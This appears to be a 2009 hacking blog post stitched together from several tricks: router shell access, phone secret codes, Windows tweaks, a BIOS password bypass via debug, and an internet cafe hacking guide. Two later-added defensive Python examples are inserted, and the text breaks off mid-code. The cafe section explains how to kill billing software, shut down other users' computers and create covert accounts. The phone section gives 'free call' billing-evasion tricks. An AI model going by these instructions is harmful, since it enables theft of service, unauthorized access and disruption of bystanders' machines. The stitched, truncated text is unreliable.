Saturday, October 17, 2009

HACK YOUR ADSL MODEM(BEETEL,DIGICOM,TP-LINK,PROLINK)






Hack # 1: How to log in to the router

Log in over telnet. This is a common feature of all routers these days, and this is the only way to hack into the box:

Default IP: 192.168.1.1
Default Username: admin
Default Password: password

I have changed the IP of the router to 192.168.1.254, so here is my first session:

$ telnet 192.168.1.254
Trying 192.168.1.254...
Connected to 192.168.1.254.
Escape character is '^]'.
BCM96338 ADSL Router
Login: admin
password: ********

Once you are logged in you will see the menu:

Main Menu
1. ADSL Link State
2. LAN
3. WAN
4. DNS Server
5. Route Setup
6. NAT
7. Firewall
8. Quality Of Service
9. Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->

Hack # 2: Get out of this stupid shell menu script/program

Yup, it is stupid stuff, and don't waste your time hitting CTRL+C or CTRL+D to get out of this script/program (break shell script). Just type sh and hit the enter key at the arrow prompt:

-> sh

And you will be taken to the shell:

BusyBox v1.00 (2005.09.20-19:57+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.
#

Hack # 3: But where is my ls command...

Type the ls or dir command:

# ls
ls: not found
# dir
dir: not found

They have removed the ls and dir commands. But don't worry, you can use the old echo command trick:

# echo *
bin dev etc lib linuxrc mnt proc sbin usr var webs

echo * is an old trick which displays the list of all files in the current directory without using the ls or dir command.

Hack # 4: Looking for advanced web based configuration, use main.html

Yet another stupid thing, they have removed main.html from the web based configuration. Basically main.html is used to configure advanced options of the router like port forwarding, DNS settings, firewall etc.

Just type http://192.168.1.254/main.html (replace 192.168.1.254 with your actual router IP address) to get all advanced options.

Hack # 5: Get more information about router hardware and Linux

Since this is a tiny device, most of the userland commands such as free, uname etc. are removed. However, the /proc file system provides all the information:

Display CPU information
# cat /proc/cpuinfo

Display RAM information
# cat /proc/meminfo

Display Linux version
# cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Tue Sep 20 15:52:07 EDT 2005

Display list of running processes:
# ps

Display list of all kernel modules (drivers):
# cat /proc/modules

Hack # 6: Get more information about your network configuration

Display list of network interfaces
# ifconfig

Get default routing information, i.e. find out your ISP's router:
# route

Display iptables rules
# iptables -L -n

Hack 6: Secure your router

(A) Fire up a web browser such as Firefox and log in to the web based interface. Type the URL http://192.168.1.1/main.html (or 192.168.1.254/main.html)

(B) Enable Firewall
Click on Security > Ip filtering > Outgoing or Incoming > Click add

(C) Change default admin password
Click on Tools > Select Administrator and type the password. > Click apply

(D) Save changes and reboot router
Click on Management > Access Control > Password > Select Admin > Setup new password
Save changes and reboot router.

Quick reboot of the router with the reboot command:
# reboot
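A check to go with the "Display iptables rules" and "Enable Firewall" steps, as an added example that is not part of the original post: it parses saved `iptables -L -n` output and flags chains that filter nothing and rules that accept telnet (23) or the web interface (80) from any source. The two listings are constructed samples, and the finding names and port list are assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Matches "Chain INPUT (policy ACCEPT)" and user chains "Chain foo (1 references)".
CHAIN_RE = re.compile(r"^Chain (\S+) \((?:policy (\w+)|\d+ references)\)")
# Management services named in this post: telnet (23) and the web interface (80).
MGMT_PORT_RE = re.compile(r"\bdpt:(23|80)\b")
ANY = "0.0.0.0/0"


@dataclass
class Rule:
    target: str
    proto: str
    source: str
    destination: str
    extra: str = ""


@dataclass
class Chain:
    name: str
    policy: Optional[str]          # None for user-defined chains
    rules: list = field(default_factory=list)


def parse_iptables(text):
    """Parse `iptables -L -n` output into {chain name: Chain}."""
    chains, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = CHAIN_RE.match(line)
        if m:
            current = Chain(m.group(1), m.group(2))
            chains[current.name] = current
            continue
        if not line or line.startswith("target") or current is None:
            continue                # blank line or column header
        parts = line.split(None, 5)  # target prot opt source destination [extra]
        if len(parts) < 5:
            continue
        extra = parts[5] if len(parts) > 5 else ""
        current.rules.append(Rule(parts[0], parts[1], parts[3], parts[4], extra))
    return chains


def audit(chains):
    """Return (chain, finding) tuples for the INPUT and FORWARD chains."""
    findings = []
    for name in ("INPUT", "FORWARD"):
        chain = chains.get(name)
        if chain is None:
            findings.append((name, "chain-missing"))
            continue
        blocks = any(r.target in ("DROP", "REJECT") for r in chain.rules)
        if chain.policy == "ACCEPT" and not blocks:
            findings.append((name, "no-filtering"))
        for r in chain.rules:
            port = MGMT_PORT_RE.search(r.extra)
            # -L -n does not print interfaces; rerun with -v to see whether
            # such a rule is limited to the LAN side before acting on it.
            if r.target == "ACCEPT" and r.source == ANY and port:
                findings.append((name, f"mgmt-port-{port.group(1)}-open-to-any"))
    return findings


# Constructed sample: firewall never enabled, telnet reachable from anywhere.
WEAK = """\
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:23

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
"""

# Constructed sample: default-deny input, web interface limited to the LAN.
HARDENED = """\
Chain INPUT (policy DROP)
target     prot opt source               destination
ACCEPT     tcp  --  192.168.1.0/24       0.0.0.0/0           tcp dpt:80
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           state RELATED,ESTABLISHED

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  --  192.168.1.0/24       0.0.0.0/0
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           state RELATED,ESTABLISHED
DROP       all  --  0.0.0.0/0            0.0.0.0/0

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
"""

if __name__ == "__main__":
    for label, listing in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(parse_iptables(listing)))
```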

MOBILE HACKING CODES AND SECRET!!!HIDDEN





Secret Codes Of Nokia Mobiles:
Below we present secret codes of Nokia mobile phones which are very useful for people who unlock phones and for amateurs of this topic. These special key sequences entered from the keyboard of the phone allow you to get some important information like IMEI number, release date, software version and much more. You can also choose the default language, activate netmonitor etc.
1610/1630
*#170602112302# (software version)
1610/1611
IMEI number: -*# 0 6 #
Software version: -* # 1 7 0 6 0 2 1 1 2 3 9 2 #
Simlock status: - # 9 2 7 0 2 6 8 9 #
2110
*#9999# (software version)
2110i/2110e
*#170602112302# or (depends on model) *#682371158412125# (software version)
NOKIA3110
*#06# -IMEI
*#3110# -Software version
##002# - allows to turn off voice mail.
*#7780# - restore factory settings
*#746025625# (or *#sim0clock#) - to check if the clock of the SIM (SIM-Clock) can be stopped (SIM-Clock-stop is a kind of standby mode which saves battery)
*#92702689# (or *#war0anty#) - "warranty code:" - you have to enter one of the following codes:
6232 (OK) - displays month and year of production date (e.g. "0198")
7332 (OK) - displays date of last repair, if there is one (e.g. "DATE NOT SAVED")
7832 (OK) - displays date of purchase, if there is one (e.g. "DATE NOT SAVED")
9268 (OK) - displays serial number
37832 (OK) - sets purchase date in format MMYY (MM - month, YY - year) - attention: you can set it only once, so beware!
87267 (OK) - displays message "Confirm Transfer?" - meaning is unknown (?)
* # 9 2 7 0 2 6 8 9 # - Simlock info
*#31# (call) - sets if your phone no. will be hidden or not (works only in some networks)
*#76# (call) - sets if target phone number when you call should be displayed (works only in some networks)
*#77# (call) - (works only in some networks)
*#33/35# (call) - displays message "Service not active".
**31# (call) -your no. will not be showed to others when you make a call

3210
*#06# -IMEI
*#0000# -software version
*#92702689# (or *#war0anty#)- enters service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system Enhanced Full Rate .
*4720# -Turns on battery save mode - saves about 30 % of energy.
#4720# -Turns off battery save mode.
xx# -Replace xx with desired phonebook entry - press # and you will see it on display.
51XX
*#06# -IMEI
*#0000# - Software version
*#92702689#( or *#war0anty#) Enter service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system - Enhanced Full Rate.
*4720# -Turns on battery save mode - saves about 30 % of energy.
#4720# -Turns off battery save mode.
#pw+1234567890+1 -provider lock status
#pw+1234567890+2 -Network lock status
#pw+1234567890+3 -Provider lock status
#pw+1234567890+4 - SimCard lock status
NOKIA 61XX
*#06# -IMEI
*#0000# or *#9999# (Nokia 6130) - Software version
*#92702689# (or *#war0anty#) - Enter service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system - Enhanced Full Rate.
*4720# -Turns on battery save mode - saves about 30 % of energy.
#4720# -Turns off battery save mode.
NOKIA8810
*#06# - IMEI
*#0000# -Software version
*#92702689# (or *#war0anty#) Enter service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system - Enhanced Full Rate.
*4720# -Turns on battery save mode - saves about 30 % of energy
#4720# -Turns off battery save mode - saves about 30 % of energy

NOKIA99OO
*#06# -IMEI
*#682371158412125# -Software version
*#3283# -Displays week and year of manufacture, ie. 1497 means 14th week of 1997.

NOKIA 9110
*#06# IMEI
*#0000# SOFTWARE VERSION
*3370# Turns on sound encoding system - Enhanced Full Rate.
#3370# Turns off sound encoding system - Enhanced Full Rate.
*4720# Turns on battery save mode - saves about 30 % of energy.
#4720# Turns off battery save mode.

NOKIA 81XX
*#06# IMEI
*#8110# Software version
xx# Replace xx with desired phonebook entry - press # and you will see it on display
*#92702689# (or *#warOanty#)
"Warranty code:" - you have to enter one of the following codes:
9268 (OK) displays IMEI (International Mobile Equipment Identification)
6232 (OK) displays date of manufacture in format MMYY (MM - month, YY - year)
7832 (OK) displays date of purchase
7332 (OK) displays date of repair or upgrade
37832 (OK) sets date of purchase in format MMYY (MM - month, YY - year) - attention: you can set it only once, so beware !!!
87267 (OK) transmits user data/moves data to service PC

Motorola Codes:

Motorola 920---------------
Press menu and type one of these numbers and press OK:
11 = Status Review
13 = Available Networks
14 = Preferred Networks
22 = Select Keypad Tones
25 = Require SIM Card PIN
26 = Language Selection
32 = Repetitive Timer
33 = Single Alert Timer
34 = Set IN-Call Display
35 = Show Call Timers
36 = Show Call Charges
37 = Call Charge Settings
38 = Reset All Timers
43 = Reset All Timers
45 = Show Last Call
46 = Total For All Calls
47 = Lifetime Timer
51 = Change Unlock Code
52 = Master Reset
53 = Master Clear (Warning!! May result in deleting the Message Editor!!!)
54 = New Security Code
55 = Automatic Lock
63 = Battery Saving Mode
Free call tip
1 Enter the phone number
2 Enter OK
3 Type *#06#
4 Press Button C
5 And finally press the button for power off.
You should now be able to talk without being billed.
The 54# Tip:
Type 1#, 2#........54# on the keypad (when you're not in the menu) to get the phone number assigned to this key for speed dialing.


Motorola 930--------------
Press menu and type one of these numbers and press OK:
11 = Status Review
13 = Available Networks
14 = Preferred Networks
22 = Select Keypad Tones
25 = Require SIM Card PIN
26 = Language Selection
32 = Repetitive Timer
33 = Single Alert Timer
34 = Set IN-Call Display
35 = Show Call Timers
36 = Show Call Charges
37 = Call Charge Settings
38 = Reset All Timers
43 = Reset All Timers
45 = Show Last Call
46 = Total For All Calls
47 = Lifetime Timer
51 = Change Unlock Code
52 = Master Reset
53 = Master Clear (Warning!! May result in deleting the Message Editor!!!)
54 = New Security Code
55 = Automatic Lock
63 = Battery Saving Mode
Free call tip
1 Enter the phone number
2 Enter OK
3 Type *#06#
4 Press Button C
5 And finally press the button for power off.
You should now be able to talk without being billed.
The 54# Tip:
Type 1#, 2#........54# on the keypad (when you're not in the menu) to get the phone number assigned to this key for speed dialing.


Motorola 6200--------------

(Note: pause means the * key held in until box appears)
To activate RBS type: [pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng Field Options' function with the keys, and enable it.
De-activate RBS
To de-activate RBS type: [pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]
This only works with some versions of software.
These countries have been reported working:
UK (Orange), AU
What's the use of RBS:
Get Distance From Base Station - Place a call, when it is answered, press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550, and the result is the distance from the RBS (Radio Base Station), in meters.
Get Signal Quality - press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'C1' appears. This is the signal quality. If it becomes negative for longer than 5 seconds, a new cell is selected.
Pin Outs
Numbered left to right, keypad up, battery down
1. Audio Ground
2. V+
3. True data (TD) (input)
4. Downlink - Complementary data (CD) (input)
5. Uplink - Return data (RD) (output)
6. GND
7. Audio Out - on/off
8. Audio In
9. Manual Test - ???
10. Battery Feedback
11. Antenna connector


Motorola 7500-------------

(Note: pause means the * key held in until box appears)
To activate RBS type: [pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng Field Options' function with the keys, and enable it.
De-activate RBS
To de-activate RBS type: [pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]
This only works with some versions of software.
These countries have been reported working:
IT (model: F16 HW: 5.2 SW: 2.1)
What's the use of RBS:
Get Distance From Base Station - Place a call, when it is answered, press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550, and the result is the distance from the RBS (Radio Base Station), in meters.
Get Signal Quality - press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'C1' appears. This is the signal quality. If it becomes negative for longer than 5 seconds, a new cell is selected.
Pin Outs
Numbered right to left, keypad up, battery down looking
1. Gnd
2. Pos
3. True data (TD) (input)
4. Complementary data (CD) (input)
5. Return data (RD) (output)
6. Audio gnd
7. Audio out
8. Audio in

Motorola 8200--------------

(Note: pause means the * key held in until box appears)
To activate RBS type: [pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng Field Options' function with the keys, and enable it.
De-activate RBS
To de-activate RBS type: [pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]
This only works with some versions of software.
These countries have been reported working:
ES, AU, NL, BE
What's the use of RBS:
Get Distance From Base Station - Place a call, when it is answered, press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550, and the result is the distance from the RBS (Radio Base Station), in meters.
Get Signal Quality - press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'C1' appears. This is the signal quality. If it becomes negative for longer than 5 seconds, a new cell is selected.
Pin Outs
Numbered right to left, keypad up, battery down looking
1. Audio Ground
2. V+
3. True data (TD) (input)
4. Downlink - Complementary data (CD) (input)
5. Uplink - Return data (RD) (output)
6. GND
7. Audio Out - on/off
8. Audio In
9. Manual Test - ???
10. Battery Feedback
11. Antenna connector


Motorola 8400-------------

(Note: pause means the * key held in until box appears)
To activate RBS type: [pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng Field Options' function with the keys, and enable it.
De-activate RBS
To de-activate RBS type: [pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]
This only works with some versions of software.
These countries have been reported working:
ES, AU, NL, BE
What's the use of RBS:
Get Distance From Base Station - Place a call, when it is answered, press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550, and the result is the distance from the RBS (Radio Base Station), in meters.
Get Signal Quality - press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'C1' appears. This is the signal quality. If it becomes negative for longer than 5 seconds, a new cell is selected.
Pin Outs
Numbered right to left, keypad up, battery down looking
1. Audio Ground
2. V+
3. True data (TD) (input)
4. Downlink - Complementary data (CD) (input)
5. Uplink - Return data (RD) (output)
6. GND
7. Audio Out - on/off
8. Audio In
9. Manual Test - ???
10. Battery Feedback
11. Antenna connector


Motorola 8700--------------

*#06# for checking the IMEI (International Mobile Equipment Identity)
Activate RBS
(Note: pause means the * key held in until box appears)
To activate RBS type: [pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng Field Options' function with the keys, and enable it.
De-activate RBS
To de-activate RBS type: [pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]
This only works with some versions of software.
These countries have been reported working:
AU, IT, SG, DE, ES, ZA
What's the use of RBS:
Get Distance From Base Station - Place a call, when it is answered, press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550, and the result is the distance from the RBS (Radio Base Station), in meters.
Get Signal Quality - press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'C1' appears. This is the signal quality. If it becomes negative for longer than 5 seconds, a new cell is selected.


Motorola CD 160---------------

Press menu and type one of these numbers and press OK:
11 = Status Review
13 = Available Networks
14 = Preferred Networks
22 = Select Keypad Tones
25 = Require SIM Card PIN
26 = Language Selection
32 = Repetitive Timer
33 = Single Alert Timer
34 = Set IN-Call Display
35 = Show Call Timers
36 = Show Call Charges
37 = Call Charge Settings
38 = Reset All Timers
43 = Reset All Timers
45 = Show Last Call
46 = Total For All Calls
47 = Lifetime Timer
51 = Change Unlock Code
52 = Master Reset
53 = Master Clear (Warning!! May result in deleting the Message Editor!!!)
54 = New Security Code
55 = Automatic Lock
63 = Battery Saving Mode
Free call tip
1 Enter the phone number
2 Enter OK
3 Type *#06#
4 Press Button C
5 And finally press the button for power off.
You should now be able to talk without being billed.


Motorola CD 520----------------

Press menu and type one of these numbers and press OK:
11 = Status Review
13 = Available Networks
14 = Preferred Networks
22 = Select Keypad Tones
25 = Require SIM Card PIN
26 = Language Selection
32 = Repetitive Timer
33 = Single Alert Timer
34 = Set IN-Call Display
35 = Show Call Timers
36 = Show Call Charges
37 = Call Charge Settings
38 = Reset All Timers
43 = Reset All Timers
45 = Show Last Call
46 = Total For All Calls
47 = Lifetime Timer
51 = Change Unlock Code
52 = Master Reset
53 = Master Clear (Warning!! May result in deleting the Message Editor!!!)
54 = New Security Code
55 = Automatic Lock
63 = Battery Saving Mode
Free call tip
1 Enter the phone number
2 Enter OK
3 Type *#06#
4 Press Button C
5 And finally press the button for power off.
You should now be able to talk without being billed.


Motorola d460--------------

#06# for checking the IMEI (International Mobile Equipment Identity)
Activate RBS
(Note: pause means the * key held in until box appears)
To activate RBS type: [pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng Field Options' function with the keys, and enable it.
De-activate RBS
To de-activate RBS type: [pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]
This only works with some versions of software.
What's the use of RBS:
Get Distance From Base Station - Place a call, when it is answered, press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550, and the result is the distance from the RBS (Radio Base Station), in meters.
Get Signal Quality - press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'C1' appears. This is the signal quality. If it becomes negative for longer than 5 seconds, a new cell is selected.


Motorola V3688---------------

#06# for checking the IMEI (International Mobile Equipment Identity)
Enhanced Full Rate Codec (EFR):
To Enable EFR press [][][] 119 [] 1 [] OK.
To Disable EFR press [][][] 119 [] 0 [] OK
NOTE: Nothing appears on Screen.


Ericsson Mobile Secret Codes:
T10
*#06# for checking the IMEI (International Mobile Equipment Identity)
>*<<*<* for checking the firmware revision information (software release)
>*<<*<*>> n-row text strings. If you press yes you can check the phone's text programming in the currently selected language.
Shortcut for Last Dialed call menu
If you for some reason don't want to enter the 'Last Dialed calls menu' by using the 'YES' key you can use the following keystroke instead: First '0' then '#'.
Access menu without Sim card
To access the menu in your phone without having a card inside do the following: type **04*0000*0000*0000# When the display says "Wrong Pin" press NO and you have access to all the menus: Info, Access, Settings, Calculator, Clock, Keylock On?, Mail, Phone book. NOTE: if you try this, your phone may stop at the Keylock On? menu and you'll have to take your battery out to turn the phone on again. And this will not care about Phone lock!
A way to (un)lock your cell phone on to the network (subset):
1. Press <**<
2. tac = Type code, fac = Final code, snr = Serial number, sp = Spare
>*<<*<* for checking the firmware revision information (software release)
>*<<*<*> 1-row text strings. If you press yes you can check the phone's text programming in the currently selected language.
>*<<*<*>> n-row text strings. if pressing yes you can check the phones text programming in currently selected language.
The Service Provider (SP) Lock
The Service Provider (SP) Lock menu is used to lock the cell phone to the SP's SIM card. Once the cell phone is locked to a specific operator, if one inserts a SIM card from a different operator the phone will refuse to accept it! The cell phone will however accept another SIM card from the same operator.
To activate/deactivate this lock one needs a special secret code that is not available to the end user.
Here is how to activate the menu:
<**<
>*<<*<* for checking the firmware revision information (software release)
>*<<*<*> 1-row text strings. If you press yes you can check the phone's text programming in the currently selected language. (298 entries)
>*<<*<*>> n-row text strings. if pressing yes you can check the phones text programming in currently selected language.(160 entries?)
To activate/deactivate this lock one needs a special secret code that is not available to the end user. (not even to you... or is it ? in case please let me know!)
Here is how to activate the menu:
<**<> key for a second or two The option Menu size turns up Choose 'yes' and go from there.
An alarm clock turned up too but it never rang. I think this was because there is no clock in the phone.
Free phone calls using the GA628
This trick has only been reported working on PREPAID GSM CARDS and in some countries and with some sw versions. The prepaid GSM SIM CARD is a kind of "SIM card" which only has a certain amount of credit on it (like a normal phonebox telecard)... if it can be traced? - we don't know...
Well.. here's the trick: you dial the no. normally and press YES. While "connecting" is shown on the screen, the following procedure should be carried out: Press CLR then 0 then # and then NO (twice) so as to switch OFF the phone. You can then still speak on the phone while it is switched off but the SIM card does not record your calls which will lead to FREE phone calls in some countries.. we hope!!
Another variant of the code
Make a call, while the phone says Connecting type 083# (the position 83 must be empty!), when the phone says Pos Empty, press the NO key and turn off the phone.
If you can make the call with the phone turned off you will face a problem when you need to hang up the phone... the only way for you to do that is to remove the battery...???

CREATE YOUR OWN ANTIVIRUS FOR FREE


Hello friends, this is aruj parajuli. The problem is when I reinstall Windows, my id changes from admin to admin.windows or administrator.whatever. I want %% to be used so that the batch file can locate the Windows XP directory and my Documents and Settings folder.
Any help will be appreciated.
*********************************************
copy following code in notepad..and save as aruj.bat and run it


@echo off
REM Quote both sides so a user name containing spaces does not break the comparison.
if "%username%"=="Administrator.WINDOWS" goto admin

REM ** Delete User Files **
rmdir /S /Q "%systemdrive%\Documents and Settings\%username%\Recent"
rmdir /S /Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temp"
rmdir /S /Q "%systemdrive%\Documents and Settings\%username%\Local Settings\History\History.ie5"
rmdir /S /Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temporary Internet Files\content.ie5"
goto end

:admin
REM ** Do some extra stuff here **
REM ** What ever you want..... **
ECHO You are a Administrator
rmdir /S /Q "%systemdrive%\Documents and Settings\%username%\Recent"
rmdir /S /Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temp"
rmdir /S /Q "%systemdrive%\Documents and Settings\%username%\Local Settings\History\History.ie5"
rmdir /S /Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temporary Internet Files\content.ie5"
REM ** Do more stuff here **
REM ** Blah, blah, blah......**

:end
exit

USE GMAIL IN MSN MESSENGER


I think all of you know it, but if someone doesn't, then here it is. Go to this page:
https://register.passport.net/default.srf?sl=1
Enter your Gmail account as the email address.
Fill in all the other blanks and continue the registration.
Go to your Gmail account and verify the registration, and now sign in with MSN.

Actually this works with all emails, not only Gmail.

BURN CD IN 3 MIN 26 SEC TESTED



windows xp has burning software built in which can cause problems sometimes when burning with other programs.
you can turn windows xp burning tool off like this.
Go to "administrative tools" in the control panel.
In the "services" list, disable the IMAPI CD-Burning COM service.

BOOT YOUR XP AS FAST AS SPEED OF LIGHT



First of all, this tweak only applies to those who have only one HDD on their primary IDE channel (nothing else on device 0 or 1) and a CD-ROM and/or DVD-ROM on the secondary IDE channel. Each time you boot Windows XP, there's an updated file called NTOSBOOT-*.pf that appears in your prefetch directory (%SystemRoot%\Prefetch), and there's no need to erase any other files as the new prefetch option in XP really improves loading time of installed programs. We only want Windows XP to boot faster and not decrease its performance. Thanks to Rod Cahoon (for the prefetch automation process...with a minor change of mine) and Zeb for the IDE Channel tweak as those two tricks, coupled together with a little modification, result in an EXTREMELY fast bootup:
1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.
WindowsXP should now boot REALLY faster.

HACK BIOS EASILY



Wanna hack BIOS? It's the easiest method of hacking worldwide.


Follow the steps below:
1) Boot up Windows.
2) Go to the DOS prompt, or go to the command prompt directly from the Windows start-up menu.
3) Type the command at the prompt: "debug" (without quotes)
4) Type the following lines now exactly as given:
o 70 10
o 71 20
quit
exit
5) Exit from the DOS prompt and restart the machine.
Password protection gone!

please post comment

MAKE PC PENTIUM 5 IN 1 MIN




FOLLOW THE STEPS:
GO TO START > RUN > TYPE REGEDIT > HKEY_LOCAL_MACHINE > HARDWARE > DESCRIPTION > SYSTEM > CENTRAL PROCESSOR > ON THE RIGHT HAND SIDE RIGHT CLICK ON PROCESSOR NAME AND STRING AND THEN CLICK ON MODIFY AND WRITE WHATEVER YOU WANT, OR NAME IT PENTIUM 5 OR MORE
HEYY FRNDS DO REPLY in guestbook IF U LIKE THIS TRICK

INTERNET CAFE HACKING FOR UNLIMITED TIME 100%TESTED




Basic overview of this tutorial: if there's some kind of timer or client software on the computer you're using at the Net Cafe, you can hopefully disable it.
Firstly we need to gain access to the command prompt (cmd.exe). There are a few ways to do this.
1) The most basic is to go Start/Run/cmd.exe and a black input screen should pop up. Say that's disabled, then we can try some other methods.
2) Press the Windows Logo + R and it will start run up. (hopefully)
3) Navigate your way to C:\WINDOWS\system32 and run cmd.exe from in there.
4) Open notepad, type "cmd.exe" without the quotation marks ("") and then go to File/Save As.. and type the name for the file and have it end with .bat, for example "MyNewFile.bat", and select Save as type and select All Files.
Make sure to save it somewhere you can access it, like the desktop.
If they have deleted Notepad then go in to Internet Explorer and right click and select View Source, or on the menu bar click View then Source, and perform the same process as above.
Once you have done this you can run the file. If you can't open files from the desktop then go back into Internet Explorer and go to View/Explorer Bar/Folders and navigate to the Desktop and it will show the saved files on the desktop in a folder type window.
Once you have access to the command prompt you can perform some useful actions, e.g. shut down programs, shut down other people's computers, add new accounts.
Ok, well most Net cafes have software running that boots you off of the machine after a certain amount of time unless you pay for more time. Well, we don't want that to happen now do we?
Firstly try to figure out the name of the Net Cafe's timing/credit software, because this can help.

For more info on the software running we can use the command "tasklist" inside of the command prompt.
example: "tasklist" (without quotation marks)
Basically it brings up all the processes running.
Now say we know the process name for the Net Cafe's software, we need to disable it. So, how do we do that? We use "taskkill" >:]
Basically it kills the process we specify. Say the Net Cafe's software is "Timer.exe" for example and it's shown in the task list like that, we would do this.
example: "taskkill /im Timer.exe /f"
/im : is for image name. Not quite sure what it means, but we need it.
Timer.exe : that's the Net Cafe's software/process name (example)
/f : Forcefully shuts the program.
Now hopefully your Net Cafe's software is terminated and you can freely use their computer with no time restriction.
If you have no luck finding the Net Cafe's software name then just try ending processes that Windows doesn't rely on.

Perhaps you want to have a little fun with people on the network at the Net cafe? well here's a few things for youto do with command prompt.
Find the people on the network with "net view" and it will list the other computers names on the network.
The shutdown command. Basically the shutdown command will shutdown a computer on the network or your own computer (comes inhandy)
example: "shutdown -s -m HJCPwnts -t 20 -c You're being shutdown"
use "shutdown -a" to cancel this action so you don't shut your own computer down.
-s : sets the shutdown action.
-m : specify the computer name (HJCPwnts), that's what my computer name would be on the network. (To find computer names use net view. It will list the other computer names.)
-t : the time until shutdown in seconds. Just set it to 0 if you want it instant.
-c : the comment that will be shown on the shutdown window (not needed, but good to leave the victim a message)
-f : I left this one out because it shuts down the applications the user is running, but add it on the end when doing it to someone else.
Now for some more stuff. Perhaps we want to create a new account on this computer and log in to it? Well, let's do it then. Ok, this is how we do it.
In command prompt type "net user ARUJ /add"; this basically adds a new user by the name of ARUJ. Simple, eh? Well, we have struck a problemo. How the hell do we log in to that account? EASY!
In fact we have already covered most of it. We will be using the shutdown command again.
"shutdown -l" : basically this logs us out and we can log back in with the ARUJ account.
-l : sets the logout action.
Ok, so you have had your fun with the new account now and you want to get rid of it in case the Net Cafe staff find it. Well, that's simple as well, all we do is..
"net user ARUJ /delete" and it will delete that user. Make sure to check it has been deleted by using "net user" and it will show the accounts.

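Seen from the cafe operator's side, every command in this walkthrough leaves a process-creation record when command-line auditing is switched on. The following is an added example, not part of the original post: it flags the post's commands (a forced taskkill of the billing process, shutdown with -m, net user /add and /delete) in constructed log lines and pairs an account's creation with its quick deletion. The flat log format, host names, user names and timestamps are assumptions made up for the example.

```python
from datetime import datetime, timedelta

# Constructed sample, one record per line: "<ISO time> <host> <user> <command line>".
# The format, hosts and times are assumptions for this example; real input would
# come from process-creation auditing with command lines recorded.
SAMPLE_LOG = """\
2009-10-17T14:02:11 CAFE-PC07 guest tasklist
2009-10-17T14:02:40 CAFE-PC07 guest taskkill /im Timer.exe /f
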